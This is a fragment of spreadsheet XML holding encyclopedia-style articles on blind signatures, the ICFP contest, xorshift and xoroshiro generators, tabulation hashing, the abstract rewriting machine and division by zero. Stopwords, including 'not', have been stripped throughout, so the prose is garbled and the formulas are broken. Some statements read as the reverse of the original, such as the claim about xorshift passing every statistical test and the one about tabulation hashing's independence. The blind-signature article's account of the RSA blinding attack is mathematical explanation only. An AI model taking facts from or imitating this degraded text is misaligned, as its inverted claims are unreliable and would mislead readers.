    <t>cryptography blind signature, introduced david chaum, form digital signature content message disguised (blinded) signed. resulting blind signature publicly verified original, unblinded message manner regular digital signature. blind signatures typically employed privacy-related protocols signer message author different parties. examples include cryptographic election systems digital cash schemes. often-used analogy cryptographic blind signature physical voter enclosing completed anonymous ballot special carbon paper lined envelope voter's credentials pre-printed outside. official verifies credentials signs envelope, thereby transferring signature ballot inside carbon paper. once signed, package given back voter, transfers signed ballot unmarked normal envelope. thus, signer view message content, third party later verify signature know signature valid within limitations underlying signature scheme. blind signatures also used provide unlinkability, prevents signer linking blinded message signs later un-blinded version called upon verify. case, signer's response first "un-blinded" prior verification signature remains valid un-blinded message. this useful schemes anonymity required. blind signature schemes implemented using number common public signing schemes, instance dsa. perform signature, message first "blinded", typically combining random "blinding factor". blinded message passed signer, signs using standard signing algorithm. resulting message, along blinding factor, later verified signer's public key. blind signature schemes, rsa, even possible remove blinding factor signature verified. schemes, final output (message/signature) blind signature scheme identical normal signing protocol. uses blind signature schemes great deal applications sender privacy important. this includes various "digital cash" schemes voting protocols. example, integrity electronic voting system require ballot certified election authority accepted counting; allows authority check credentials voter ensure allowed vote, submitting ballot. simultaneously, important authority learn voter's selections. unlinkable blind signature provides guarantee, authority contents ballot signs, unable link blinded ballots signs back un-blinded ballots receives counting. blind signature schemes blind signature schemes exist many public signing protocols. more formally blind signature scheme cryptographic protocol involves parties, user alice wants obtain signatures messages, signer possession secret signing key. protocol alice obtains bob’s signature without learning anything message. this intuition learning anything hard capture mathematical terms. usual approach show every (adversarial) signer, exists simulator output information signer. this similar zero-knowledge defined zero-knowledge proof systems. blind signatures simplest blind signature schemes based signing. traditional signature computed raising message secret exponent modulo public modulus blind version uses random value relatively prime (i.e. gcd(r, raised public exponent modulo resulting value {\displaystyle r^{e}{\bmod {n}}} used blinding factor. author message computes product message blinding factor, i.e.: {\displaystyle m'\equiv mr^{e}\ (\mathrm {mod} sends resulting value {\displaystyle signing authority. because random value mapping {\displaystyle r\mapsto r^{e}{\bmod {n}}} permutation follows {\displaystyle r^{e}{\bmod {n}}} random too. this implies {\displaystyle leak information signing authority calculates blinded signature {\displaystyle s'\equiv (m')^{d}\ (\mathrm {mod} n).} sent back author message, remove blinding factor reveal valid signature {\displaystyle s\equiv s'\cdot r^{-1}\ (\mathrm {mod} this works keys satisfy equation {\displaystyle r^{ed}\equiv r{\pmod {n}}} thus {\displaystyle s\equiv s'\cdot r^{-1}\equiv (m')^{d}r^{-1}\equiv m^{d}r^{ed}r^{-1}\equiv m^{d}rr^{-1}\equiv m^{d}{\pmod {n}},} hence indeed signature practice, property signing blinded message produces valid signed messages usually desired. this means vote signed ballot elections, example. this property hold simple scheme described above: original message unblinded signature valid, blinded message blind signature, possibly combinations given clever attacker. solution blind sign cryptographic hash message, message itself. dangers blind signing subject blinding attack possible tricked decrypting message blind signing another message. since signing process equivalent decrypting signer's secret key, attacker provide blinded version message {\displaystyle encrypted signer's public key, {\displaystyle sign. encrypted message would usually secret information attacker observed sent encrypted signer's public attacker wants learn about. when attacker removes blindness signed version clear text: {\displaystyle {\begin{aligned}m''&amp;=m'r^{e}{\pmod {n}}\\&amp;=(m^{e}{\pmod {n}}\cdot r^{e}){\pmod {n}}\\&amp;=(mr)^{e}{\pmod {n}}\\\end{aligned}}} {\displaystyle encrypted version message. when message signed, cleartext {\displaystyle easily extracted: since {\displaystyle {\begin{aligned}s'&amp;=m''^{d}{\pmod {n}}\\&amp;=((mr)^{e}{\pmod {n}})^{d}{\pmod {n}}\\&amp;=(mr)^{ed}{\pmod {n}}\\&amp;=m\cdot r{\pmod {n}}{\mbox{, since }}ed\equiv 1{\pmod {\phi (n)}}\\\end{aligned}}} note {\displaystyle \phi (n)} refers euler's totient function. message easily obtained. {\displaystyle {\begin{aligned}m=s'\cdot r^{-1}{\pmod {n}}\end{aligned}}} this attack works blind signature scheme signer signs message directly. contrast, unblinded signature scheme signer would typically padding scheme (e.g. instead signing result cryptographic hash function applied message, instead signing message itself), however since signer know actual message, padding scheme would produce incorrect value unblinded. multiplicative property rsa, never used encryption signing purposes. also dining cryptographers protocol electronic money references external links application 1571777, canard, gaud, traore, "electronic voting process using fair blind signatures", published 2005-09-07, assigned france telecom security blind signatures under aborts implementation blind signature java</t>
  </si>
  <si>
    <t>ICFP Programming Contest</t>
  </si>
  <si>
    <t>icfp programming contest international programming competition held annually around june july since 1998, results announced international conference functional programming. teams size programming language(s) used. there also entry fee. participants hours complete submit entry internet. there often also 24-hour lightning division. winners reserve "bragging rights" claim language "the programming tool choice discriminating hackers". such, competition's goals showcase capabilities contestants' favorite programming languages tools. previous first prize winners used haskell, ocaml, c++, cilk, java, rust. contests usually around submitted entries. past tasks prizes prizes modest cash value, primarily aimed helping winners attend conference, prizes awarded judges make following declarations: first prize [language programming tool choice discriminating hackers. second prize [language fine programming tool many applications. third prize [language also shabby. winner lightning division [language suitable rapid prototyping. judges' prize [team extremely cool bunch hackers.where winning entry involves several languages, winners asked nominate two. languages named judges' declarations been: also international collegiate programming contest (icpc) online judge references notes external links contest icfp site</t>
  </si>
  <si>
    <t>Xorshift</t>
  </si>
  <si>
    <t>xorshift random number generators, also called shift-register generators, class pseudorandom number generators discovered george marsaglia. they subset linear-feedback shift registers (lfsrs) allow particularly efficient implementation software without using excessively sparse polynomials. they generate next number sequence repeatedly taking exclusive number bit-shifted version itself. this makes execute extremely efficiently modern computer architectures, benefit efficiency hardware implementation. like lfsrs, parameters chosen carefully order achieve long period.for execution software, xorshift generators among fastest non-cryptographically-secure random number generators, requiring small code state. however, pass every statistical test without refinement. this weakness well-known amended pointed marsaglia original paper) combining non-linear function, resulting e.g. xorshift+ xorshift* generator. native implementation xorshift+ generator passes tests bigcrush suite (with order magnitude fewer failures mersenne twister well) typically takes fewer clock cycles generate random number, thanks instruction pipelining.the scramblers known still leave weakness bits, they're intended floating point use, conversion random number floating point discards bits. general purpose, scrambler (pronounced 'starstar') makes lfsr generators pass bits. because plain xorshift generators (without non-linear step) fail statistical tests, accused unreliable.: example implementation version three xorshift algorithms: given here. first 32-bit word state, period 232−1. second 64-bit word state period 264−1. last four 32-bit words state, period 2128−1. three shifts three four exclusive-or operations: 128-bit algorithm passes diehard tests. however, fails matrixrank linearcomp tests bigcrush test suite testu01 framework. variations xorshift generators fail tests testu01's bigcrush test suite. this true generators based linear recurrences, mersenne twister well. however, easy scramble output generators improve quality. xorwow marsaglia suggested scrambling output combining simple additive counter modulo (which calls "weyl sequence" weyl's equidistribution theorem). this also increases period factor 232, 2192−232: this performs well, fails tests bigcrush. this generator default nvidia's cuda toolkit. xorshift* xorshift* generator takes xorshift generator applies invertible multiplication (modulo word size) output non-linear transformation, suggested marsaglia. following 64-bit generator bits state maximal period 264−1 fails matrixrank test bigcrush: similar generator suggested numerical recipes ranq1, also fails birthdayspacings test. generator modified return high bits, passes bigcrush zero failures.: fact, reduced version bits internal state passes suite, suggesting large safety margin.: vigna suggests following xorshift1024* generator 1024 bits state maximal period 21024−1; however always pass bigcrush. xoshiro256** therefore much better option. both generators, happens xorshift* generators, emit sequence 64-bit values equidistributed maximum possible dimension (except never output zero calls, i.e. bytes, row). xorshift+ rather using multiplication, possible addition faster non-linear transformation. idea first proposed saito matsumoto (also responsible mersenne twister) xsadd generator, adds consecutive outputs underlying xorshift generator based 32-bit shifts.xsadd, however, weakness low-order bits output; fails several bigcrush tests output words bit-reversed. correct problem, vigna introduced xorshift+ family, based 64-bit shifts: following xorshift128+ generator uses bits state maximal period 2128−1. passes bigcrush, reversed. this generator fastest generators passing bigcrush. disadvantage adding consecutive outputs underlying xorshift128 generator 2-dimensionally equidistributed, associated xorshift128+ generator 1-dimensionally equidistributed.xorshift+ generators, even large xorshift1024+, exhibit detectable linearity low-order bits output. xoshiro xoroshiro xoshiro xoroshiro variations shift-register generators, using rotations addition shifts. according vigna, faster produce better quality output xorshift.this class generator variants 32-bit 64-bit integer floating point output; floating point, takes upper bits (for binary64) upper bits (for binary32), since upper bits better quality lower bits floating point generators. algorithms also include jump function, sets state forward number steps usually power allows many threads execution start distinct initial states. xoshiro256** xoshiro256** family's general-purpose random 64-bit number generator. xoshiro256+ xoshiro256+ approximately faster xoshiro256**, lowest three bits linear complexity; therefore, used floating point results extracting upper bits. other variants space premium, xoroshiro128** equivalent xoshiro256**, xoroshiro128+ equivalent xoshiro256+. these smaller state spaces, thus less useful massively parallel programs. xoroshiro128+ also exhibits mild dependency hamming weights, generating failure output. authors believe detected real world programs. 32-bit output, xoshiro128** xoshiro128+ exactly equivalent xoshiro256** xoshiro256+, uint32_t place uint64_t, different shift/rotate constants; similarly, xoroshiro64** xoroshiro64* equivalent xoroshiro128** xoroshiro128+ respectively. unlike functions larger state, xoroshiro64** xoroshiro64* straightforward ports higher-precision counterparts. more recently, generators made alternative generators. initialization recommendation authors xoshiro paper initialize state generators using generator radically different initialized generators, well never give "all-zero" state; shift-register generators, state impossible escape from. authors specifically recommend using splitmix64 generator, 64-bit seed, follows: notes references further reading brent, richard (july 2006). "some long-period random number generators using shifts xors". anziam journal. c188–c202. lists generators various sizes four shifts (two feedback word).</t>
  </si>
  <si>
    <t>Xoroshiro128+</t>
  </si>
  <si>
    <t>xoroshiro128+ (named operations: xor, rotate, shift, rotate) pseudorandom number generator intended successor xorshift+. instead perpetuating marsaglia's tradition xorshift basic operation, xoroshiro128+ uses shift/rotate-based linear transformation designed sebastiano vigna collaboration david blackman. result significant improvement speed statistical quality. statistical quality lowest bits output generated xoroshiro128+ quality. authors xoroshiro128+ acknowledge pass statistical tests, stating this xoroshiro128+ 1.0, best fastest small-state generator floating-point numbers. suggest upper bits floating-point generation, slightly faster xoroshiro128**. passes tests aware except four lower bits, might fail linearity tests (and those), linear complexity considered issue usually case) used generate 64-bit outputs, too; moreover, generator mild hamming-weight dependency making test (http://prng.di.unimi.it/hwd.php) fail output; believe slight bias cannot affect application. concerned, xoroshiro128** xoshiro256+. suggest sign test extract random boolean value, right shifts extract subsets bits. state must seeded everywhere zero. 64-bit seed, suggest seed splitmix64 generator output fill note: parameters (a=24, b=16, c=37) version give slightly better results test 2016 version (a=55, b=14, c=36). these claims passing tests confirmed running practrand input, resulting output like shown below: rng_test using practrand version 0.93 rng_stdin64, seed 0xfac83126 test normal, folding standard bit) rng=rng_stdin64, seed=0xfac83126 length= megabytes (2^27 bytes), time= seconds test name processed evaluation [low1/64]brank(12):256(2) +3748 3e-1129 fail !!!!!!!! [low1/64]brank(12):384(1) +5405 3e-1628 fail !!!!!!!! ...and test result(s) without anomalies acknowledging authors say: suggest sign test extract random boolean value thus, programmers prefer highest bits (e.g., making heads/tails writing random_number rather random_number must noted, though, test failed instances mersenne twister well. statistical problems extend beyond bottom bits, fails practrand test even truncated fails multiple tests bigcrush even bits reversed. quotations david meister, implemented clojure, made valuable statements: "this clojure implementation xoroshiro128+ prng described http://xoroshiro.di.unimi.it. algorithm shown fast produce superior statistical results many prngs shipped languages, including java. statistical results verified practrand testu01 authors. xoroshiro128+ designed successor xorshift128+, currently used javascript engines chrome, firefox safari. both xorshift128+ xoroshiro128+ period 2128 xoroshiro128+ benchmarked authors faster fewer failures bigcrush predecessor." matt gallagher, study random number generators swift made following conclusion: looks like xoroshiro best general purpose algorithm currently available. memory (just bits storage), extremely high performance (1.2 nanoseconds 64-bit number, subtracting baseline overheads) well distributed (beating algorithms range automated tests). mersenne twister might still better choice highly conservative projects unwilling switch algorithm, current generation statistically tested algorithms brings baseline assurance outset previous generations lacked. related generators xoroshiro128** prevents linear artifacts bits xoshiro256+ bits state allowing parallelism xoshiro256** "our all-purpose, rock-solid generator"the generators ending weak bits, recommended floating point number generation, using significant bits. also list pseudorandom number generators pseudorandom number generator xorshift mersenne twister well references external links vigna, sebastiano (2018). "xoshiro xoroshiro generators prng shootout". retrieved 2018-05-04.</t>
  </si>
  <si>
    <t>Tabulation hashing</t>
  </si>
  <si>
    <t>computer science, tabulation hashing method constructing universal families hash functions combining table lookup exclusive operations. first studied form zobrist hashing computer games; later work carter wegman extended method arbitrary fixed-length keys. generalizations tabulation hashing also developed handle variable-length keys text strings. despite simplicity, tabulation hashing strong theoretical properties distinguish hash functions. particular, 3-independent: every 3-tuple keys equally likely mapped 3-tuple hash values. however, 4-independent. more sophisticated slower variants tabulation hashing extend method higher degrees independence. because high degree independence, tabulation hashing usable hashing methods require high-quality hash function, including hopscotch hashing, cuckoo hashing, minhash technique estimating size intersections. method basic idea follows: first, divide hashed smaller "blocks" chosen length. then, create lookup tables, block, fill random values. finally, tables compute hash value block, combine hashes final hash value using bitwise exclusive operation.more formally: number bits hashed, number bits desired output hash function. choose block size choice block size controls tradeoff time memory usage, made tables large, e.g., tables computer's cache memory. smaller blocks less memory slow hash function. compute ceil(p/r), number r-bit blocks needed represent key. create two-dimensional array, fill random q-bit numbers. used compute hash value h(x) given partition r-bit values, consists lowest bits consists next bits, etc. example, byte then, r-bit position values indices combine results using exclusive operation: h(x) t[0][x0] t[1][x1] t[2][x2] t[t-1][xt-1].note valid table (e.g. t[0]) since hash function would able distinguish strings xis, permuted differently. code typical example given below. history first instance tabulation hashing zobrist hashing, method hashing positions abstract board games chess named albert lindsey zobrist, published 1970. method, random bitstring generated game feature combination chess piece square chessboard. then, hash game position, bitstrings features position combined bitwise exclusive resulting hash value used index transposition table. because move typically changes small number game features, zobrist value position move updated quickly value position move, without needing loop features position.tabulation hashing greater generality, arbitrary binary values, later rediscovered carter wegman (1979) studied detail pătraşcu thorup (2012). universality carter wegman (1979) define randomized scheme generating hash functions universal keys, probability collide (that mapped value other) 1/m, number values keys take they defined stronger property subsequent paper wegman carter (1981): randomized scheme generating hash functions k-independent every k-tuple keys, possible k-tuple values, probability keys mapped values 1/mk. 2-independent hashing schemes automatically universal, universal hashing scheme converted 2-independent scheme storing random number part initialization phase algorithm adding hash value. thus, universality essentially 2-independence. however, k-independence larger values stronger property, held fewer hashing algorithms. pătraşcu thorup (2012) observe, tabulation hashing 3-independent 4-independent. single t[x0,0] equally likely take hash value, exclusive t[x0,0] remaining table values change property. keys equally likely mapped hash value before, least position table value t[yi,i] used calculation h(y) calculation h(x), even value h(x) determined, h(y) equally likely valid hash value. similarly, three keys least three keys position value differs two, even values h(x) h(y) determined, h(z) equally likely valid hash value.however, reasoning breaks four keys sets keys none four byte value share least keys. instance, keys bytes each, four keys either zero byte values, byte value position shared exactly four keys. four keys, hash values computed tabulation hashing always satisfy equation h(w) h(x) h(y) h(z) whereas 4-independent hashing scheme equation would satisfied probability 1/m. therefore, tabulation hashing 4-independent. application because tabulation hashing universal hashing scheme, used hashing-based algorithm universality sufficient. instance, hash chaining, expected time operation proportional collision probabilities, universal scheme would truly random hash functions, constant whenever load factor hash table constant. therefore, tabulation hashing used compute hash functions hash chaining theoretical guarantee constant expected time operation.however, universal hashing strong enough guarantee performance hashing algorithms. instance, linear probing, 5-independent hash functions strong enough guarantee constant time operation, 4-independent hash functions fail. nevertheless, despite 3-independent, tabulation hashing provides constant-time guarantee linear probing.cuckoo hashing, another technique implementing hash tables, guarantees constant time lookup (regardless hash function). insertions cuckoo hash table fail, causing entire table rebuilt, failures sufficiently unlikely expected time insertion (using either truly random hash function hash function logarithmic independence) constant. with tabulation hashing, hand, best bound known failure probability higher, high enough insertions cannot guaranteed take constant expected time. nevertheless, tabulation hashing adequate ensure linear-expected-time construction cuckoo hash table static keys change table used. extensions although tabulation hashing described ("simple tabulation hashing") 3-independent, variations method used obtain hash functions much higher degrees independence. siegel (2004) uses idea using exclusive operations combine random values table, complicated algorithm based expander graphs transforming bits table indices, define hashing schemes k-independent constant even logarithmic value however, number table lookups needed compute hash value using siegel's variation tabulation hashing, constant, still large practical, expanders siegel's technique also makes fully constructive. thorup (2013) provides scheme based tabulation hashing reaches high degrees independence quickly, constructive way. observes using round simple tabulation hashing expand input keys times original length, second round simple tabulation hashing expanded keys, results hashing scheme whose independence number exponential parameter number bits block partition keys blocks. simple tabulation limited keys fixed length, different table random values needs initialized position block keys. lemire (2012) studies variations tabulation hashing suitable variable-length keys character strings. general type hashing scheme studied lemire uses single table indexed value block, regardless position within key. however, values table combined complicated function bitwise exclusive lemire shows scheme type 3-independent. nevertheless, shows still possible achieve 2-independence. particular, tabulation scheme interprets values t[xi] (where before, block input) coefficients polynomial finite field takes remainder resulting polynomial modulo another polynomial, gives 2-independent hash function. mixed tabulation mixed tabulation hashing (and less general twisted tabulation) introduced dahlgaard thorup strengthen properties tabulation hashing keeping nearly performance. mixed tabulation seen xor'ing "double tabulation" thorup (2013) hash function simple tabulation hash function. this turns many nice properties even parameters chosen make mixed tabulation much faster double tabulationthe idea pick number {\displaystyle hash {\displaystyle 2^{rd+q}} bits rather {\displaystyle 2^{q}} this gives {\displaystyle "derived characters" hashed second hash function values xor'ed together. formally {\displaystyle h_{1}:[2^{p}]\to [2^{rd}]\times [2^{q}]} {\displaystyle h_{2}:[2^{rd}]\to [2^{q}]} simple tabulation functions. {\displaystyle (v_{1},v_{2})=h_{1}(x)} mixed tabulation hash defined {\displaystyle h(x)=h_{2}(v_{1})\oplus v_{2}.} following example shows algorithm {\displaystyle p=q=64} {\displaystyle r=8} {\displaystyle d=2} mixed tabulation shown 2016 strong concentration regards k-partitions, useful algorithms counting distinct elements, classical method flajolet martin. notes references secondary sourcesmorin, (february 2014), "section 5.2.3: tabulation hashing", open data structures pseudocode) (0.1gβ ed.), 115–116, retrieved 2016-01-08. mitzenmacher, michael; upfal, (2014), "some practical randomized algorithms data structures", tucker, allen; gonzalez, teofilo; diaz-herrera, jorge (eds.), computing handbook: computer science software engineering (3rd ed.), press, 11-1 11-23, isbn 9781439898529. particular section 11.1.1: tabulation hashing, 11-3 11-4.primary sources</t>
  </si>
  <si>
    <t>Abstract rewriting machine</t>
  </si>
  <si>
    <t>abstract rewriting machine (arm) virtual machine implements term rewriting minimal term rewriting systems. minimal term rewriting systems left-linear term rewriting systems rule takes forms: continuation {\displaystyle f({\vec {x}},{\vec {y}},{\vec {z}})\rightarrow g({\vec {x}},h({\vec {y}}),{\vec {z}})} return {\displaystyle f(x)\rightarrow match {\displaystyle f({\vec {x}},g({\vec {y}}),{\vec {z}})\rightarrow h({\vec {x}},{\vec {y}},{\vec {z}})} {\displaystyle f({\vec {x}},{\vec {z}})\rightarrow g({\vec {x}},y,{\vec {z}})-{\rm {for}}~y\in {\vec {x}}\cup {\vec {z}}} delete {\displaystyle f({\vec {x}},{\vec {y}},{\vec {z}})\rightarrow g({\vec {x}},{\vec {z}})} ident {\displaystyle f({\vec {x}})\rightarrow g({\vec {x}})} each forms mapped arm) processor instructions contemporary micro processors. accordingly, minimal term rewriting achieved tens hundreds clock cycles reduction step—millions reduction steps second. implements general term rewriting, every single-sorted unconditional left-linear term rewriting system transformed (compiled) minimal term rewriting system gives rise normal form relation. overview references compilation process innermost rewriting, well detailed overview arm, found "within arm's reach: compilation left-linear rewrite systems minimal rewrite systems". description lazy (non-innermost) rewriting found "lazy rewriting eager machinery". documented implementation (with term rewriting language epic) available here. note site software longer actively maintained. references giesl, middeldorp, (july 2004). "transformation techniques context-sensitive rewrite systems" (pdf). journal functional programming. (4): 379–427. citeseerx 10.1.1.127.2817. doi:10.1017/s0956796803004945. lucas, salvador (2002). "lazy rewriting context-sensitive rewriting" (pdf). electronic notes theoretical computer science. 234–254. citeseerx 10.1.1.14.3470. doi:10.1016/s1571-0661(04)80353-0. archived original (pdf) 2006-05-16. retrieved 2015-08-29. nguyen, quang-huy (2001). "compact normalisation trace lazy rewriting" (pdf). electronic notes theoretical computer science. 87–108. citeseerx 10.1.1.24.771. doi:10.1016/s1571-0661(04)00269-5. schernhammer, gramlich, (april 2008). "termination lazy rewriting revisited" (pdf). electronic notes theoretical computer science. 204: 35–51. citeseerx 10.1.1.142.1957. doi:10.1016/j.entcs.2008.03.052. kirchner, kirchner, (2014). "equational logic rewriting". handbook history logic. 255–282. doi:10.1016/b978-0-444-51624-4.50006-x. isbn 9780444516244. antoy, johannsen, libby, (2015). "needed computations shortcutting needed steps". proceedings international workshop computing terms graphs. 183: 18–32. arxiv:1505.07162v1. doi:10.4204/eptcs.183.2.</t>
  </si>
  <si>
    <t>Division by zero</t>
  </si>
  <si>
    <t>mathematics, division zero division divisor (denominator) zero. such division formally expressed {\textstyle {\tfrac {a}{0}}} dividend (numerator). ordinary arithmetic, expression meaning, number that, multiplied gives (assuming {\textstyle a\neq thus, division zero undefined. since number multiplied zero zero, expression {\displaystyle {\tfrac {0}{0}}} also undefined; form limit, indeterminate form. historically, earliest recorded references mathematical impossibility assigning value {\textstyle {\tfrac {a}{0}}} contained anglo-irish philosopher george berkeley's criticism infinitesimal calculus 1734 analyst ("ghosts departed quantities").there mathematical structures {\textstyle {\tfrac {a}{0}}} defined riemann sphere model extended complex plane) projectively extended real line; however, structures satisfy every ordinary rule arithmetic (the field axioms). computing, program error result attempt divide zero. depending programming environment type number (e.g., floating point, integer) divided zero, generate positive negative infinity ieee floating-point standard, generate exception, generate error message, cause program terminate, result special not-a-number value, crash. elementary arithmetic when division explained elementary arithmetic level, often considered splitting objects equal parts. example, consider cookies, cookies distributed equally five people table. each person would receive {\displaystyle {\tfrac {10}{5}}=2} cookies. similarly, cookies, person table, person would receive {\displaystyle {\tfrac {10}{1}}=10} cookies. dividing zero, number cookies person receives cookies evenly distributed among people table? certain words pinpointed question highlight problem. problem question "when". there distribute cookies nobody. therefore, {\displaystyle {\tfrac {10}{0}}} least elementary arithmetic—is said either meaningless undefined. are, say, cookies people, problem "evenly distribute". integer partition things parts, either parts partition elements remainder (written r1). problem cookies people solved cutting cookie half, introduces idea fractions (5/2 2+1/2) problem cookies people, hand, cannot solved preserves meaning "divides". elementary algebra, another looking division zero division always checked using multiplication. considering 10/0 example above, setting 10/0, equals divided zero, times zero equals ten, that, multiplied zero, gives number zero). instead 10/0, 0/0, every satisfies question "what number multiplied zero, gives zero?" early attempts brāhmasphuṭasiddhānta brahmagupta 598–668) earliest text treat zero number right define operations involving zero. author could explain division zero texts: definition easily proven lead algebraic absurdities. according brahmagupta, positive negative number divided zero fraction zero denominator. zero divided negative positive number either zero expressed fraction zero numerator finite quantity denominator. zero divided zero zero. 830, mahāvīra unsuccessfully tried correct mistake brahmagupta made book ganita sara samgraha: number remains unchanged divided zero." algebra four basic operations addition, subtraction, multiplication division applied whole numbers (positive integers), restrictions, elementary arithmetic used framework support extension realm numbers apply. instance, make possible subtract whole number another, realm numbers must expanded entire integers order incorporate negative integers. similarly, support division integer other, realm numbers must expand rational numbers. during gradual expansion number system, care taken ensure "extended operations", applied older numbers, produce different results. loosely speaking, since division zero meaning undefined) whole number setting, remains true setting expands real even complex numbers. realm numbers operations applied expands also changes operations viewed. instance, realm integers, subtraction longer considered basic operation since replaced addition signed numbers. similarly, realm numbers expands include rational numbers, division replaced multiplication certain rational numbers. keeping change viewpoint, question, "why can't divide zero?", becomes "why can't rational number zero denominator?". answering revised question precisely requires close examination definition rational numbers. modern approach constructing field real numbers, rational numbers appear intermediate step development founded theory. first, natural numbers (including zero) established axiomatic basis peano's axiom system expanded ring integers. next step define rational numbers keeping mind must done using sets operations already established, namely, addition, multiplication integers. starting ordered pairs integers, {(a, define binary relation this relation shown equivalence relation equivalence classes defined rational numbers. formal proof relation equivalence relation requirement second coordinate zero needed (for verifying transitivity).the explanation abstract technical many purposes, assumes existence properties rational numbers, commonly done elementary mathematics, "reason" division zero allowed hidden view. nevertheless, (non-rigorous) justification given setting. follows properties number system using (that integers, rationals, reals, etc.), equation equivalent assuming number must however, single number would determined equation every number satisfies equation, cannot assign numerical value 0/0. division inverse multiplication concept explains division algebra inverse multiplication. example, since value unknown quantity true. expression requires value found unknown quantity number multiplied number solves equation. expression requires value found unknown quantity again, number multiplied time every number solves equation instead single number taken value 0/0. general, single value can’t assigned fraction denominator value remains undefined. fallacies compelling reason allowing division zero that, allowed, many absurd results (i.e., fallacies) would arise. when working numerical quantities easy determine illegal attempt divide zero made. example, consider following computation. with assumptions: following true: dividing sides zero gives: simplified, yields: fallacy assumption dividing legitimate operation properties dividing number. however, possible disguise division zero algebraic argument, leading invalid proofs that, instance, following: disguised division zero occurs since analysis extended real line first glance seems possible define considering limit approaches positive limit right however, limit left {\displaystyle \lim _{b\to 0}{a \over undefined (the limit also undefined negative furthermore, obvious definition derived considering limit ratio. limit exist. limits form f(x) g(x) approach approaches equal real infinite value, exist all, depending particular functions example, consider: this initially appears indeterminate. however: limit exists, equal {\displaystyle these similar facts show expression {\displaystyle {\frac {0}{0}}} cannot well-defined limit. formal operations formal calculation carried using rules arithmetic, without consideration whether result calculation well-defined. thus, sometimes useful think a/0, {\displaystyle \infty this infinity either positive, negative, unsigned, depending context. example, formally: formal calculation, invalid results obtained. logically rigorous opposed formal) computation would assert since one-sided limits different, two-sided limit exist standard framework real numbers. also, fraction left undefined extended real line, therefore meaningless expressions. projectively extended real line {\displaystyle \mathbb \cup \{\infty projectively extended real line, one-point compactification real line. here {\displaystyle \infty means unsigned infinity point infinity, infinite quantity neither positive negative. this quantity satisfies {\displaystyle -\infty =\infty necessary context. structure, {\displaystyle {\frac {a}{0}}=\infty defined nonzero {\displaystyle {\frac {a}{\infty }}=0} {\displaystyle \infty natural view range tangent function cotangent functions trigonometry: tan(x) approaches single point infinity approaches either +π/2 −π/2 either direction. this definition leads many interesting results. however, resulting algebraic structure field, expected behave like one. example, {\displaystyle \infty +\infty undefined extension real line. riemann sphere {\displaystyle \mathbb ^{*}=\mathbb \cup \{{\tilde {\infty }}\}} riemann sphere, major importance complex analysis. here {\displaystyle {\tilde {\infty represents complex infinity, also point infinity. this analogous projectively extended real line, except based field complex numbers. riemann sphere, {\displaystyle {\frac {1}{0}}={\tilde {\infty {\displaystyle {\frac {1}{\tilde {\infty }}}=0} {\displaystyle {\frac {0}{0}}} {\displaystyle {\frac {\tilde {\infty }}{\tilde {\infty }}}} {\displaystyle 0\times {\tilde {\infty undefined. higher mathematics although division zero cannot sensibly defined real numbers integers, possible consistently define similar operations, mathematical structures. non-standard analysis hyperreal numbers surreal numbers, division zero still impossible, division non-zero infinitesimals possible. distribution theory distribution theory extend function {\textstyle {\frac {1}{x}}} distribution whole space real numbers effect using cauchy principal values). not, however, make sense "value" distribution sophisticated answer refers singular support distribution. linear algebra matrix algebra linear algebra general), define pseudo-division, setting ab+, represents pseudoinverse proven exists, b−1. equals abstract algebra abstract algebra, integers, rational numbers, real numbers, complex numbers abstracted general algebraic structures, commutative ring, mathematical structure addition, subtraction, multiplication behave familiar number systems, division defined. adjoining multiplicative inverses commutative ring called localization. however, localization every commutative ring zero trivial ring, {\displaystyle 0=1} nontrivial commutative rings inverses zero, thus division zero undefined nontrivial commutative rings. nevertheless, number system forms commutative ring extended seldom used structure called wheel division zero always possible. however, resulting mathematical structure longer commutative ring, multiplication longer distributes addition. furthermore, wheel, division element longer results multiplicative identity element {\displaystyle original system integral domain, multiplication wheel longer results cancellative semigroup. concepts applied standard arithmetic similar general algebraic structures, rings fields. field, every nonzero element invertible multiplication; above, division poses problems attempting divide zero. this likewise true skew field (which reason called division ring). however, rings, division nonzero elements also pose problems. example, ring z/6z integers meaning expression {\textstyle {\frac {2}{2}}} solution equation {\displaystyle 2x=2} ring z/6z, zero divisor. this equation distinct solutions, expression {\textstyle {\frac {2}{2}}} undefined. field theory, expression {\textstyle {\frac {a}{b}}} shorthand formal expression ab−1, multiplicative inverse since field axioms guarantee existence inverses nonzero elements, expression meaning zero. modern texts, define fields special type ring, include axiom fields equivalent) zero ring excluded field. zero ring, division zero possible, shows field axioms sufficient exclude division zero field. computer arithmetic ieee floating-point standard, supported almost modern floating-point units, specifies every floating-point arithmetic operation, including division zero, well-defined result. standard supports signed zero, well infinity (not number). there zeroes: (positive zero) (negative zero) removes ambiguity dividing. ieee arithmetic, positive infinity positive, negative infinity negative, infinity signs change dividing instead. justification definition preserve sign result case arithmetic underflow. example, single-precision computation 1/(x/2), ±2−149, computation underflows produces sign matching result sign matching sign match exact result ±2150, magnitude exact result large represent, infinity used indicate overflow. integer division zero usually handled differently floating point since integer representation result. some processors generate exception attempt made divide integer zero, although others simply continue generate incorrect result division. result depends division implemented, either zero, sometimes largest possible integer. because improper algebraic results assigning value division zero, many computer programming languages (including used calculators) explicitly forbid execution operation prematurely halt program attempts sometimes reporting "divide zero" error. cases, special behavior desired division zero, condition must explicitly tested (for example, using statement). some programs (especially fixed-point arithmetic dedicated floating-point hardware available) behavior similar ieee standard, using large positive negative numbers approximate infinities. programming languages, attempt divide zero results undefined behavior. graphical programming language scratch used many schools returns infinity −infinity depending sign dividend. two's complement arithmetic, attempts divide smallest signed integer attended similar problems, handled range solutions, explicit error conditions undefined behavior. most calculators either return error state undefined; however, graphing calculators evaluate (1/0)2 microsoft math mathematica return complexinfinity 1/0. maple sagemath return error message 1/0, infinity 1/0.0 (0.0 tells systems floating-point arithmetic instead algebraic arithmetic). some modern calculators allow division zero special cases, useful students and, presumably, understood context mathematicians. some calculators, online desmos calculator example, allow arctangent(1/0). students often taught inverse cotangent function, arccotangent, calculated taking arctangent reciprocal, calculator allow arctangent(1/0), giving output {\displaystyle {\tfrac {\pi }{2}}} correct value arccotangent mathematical justification limit goes zero arctangent {\displaystyle {\tfrac {\pi }{2}}} historical accidents september 1997, division zero error "remote data base manager" aboard yorktown (cg-48) brought machines network, causing ship's propulsion system fail. also asymptote defined undefined division zero, short story chiang indeterminate form zero divisor zero power zero references notes sources further reading</t>
  </si>
  <si>
    <t>Ilbe Storehouse</t>
  </si>
  <si>
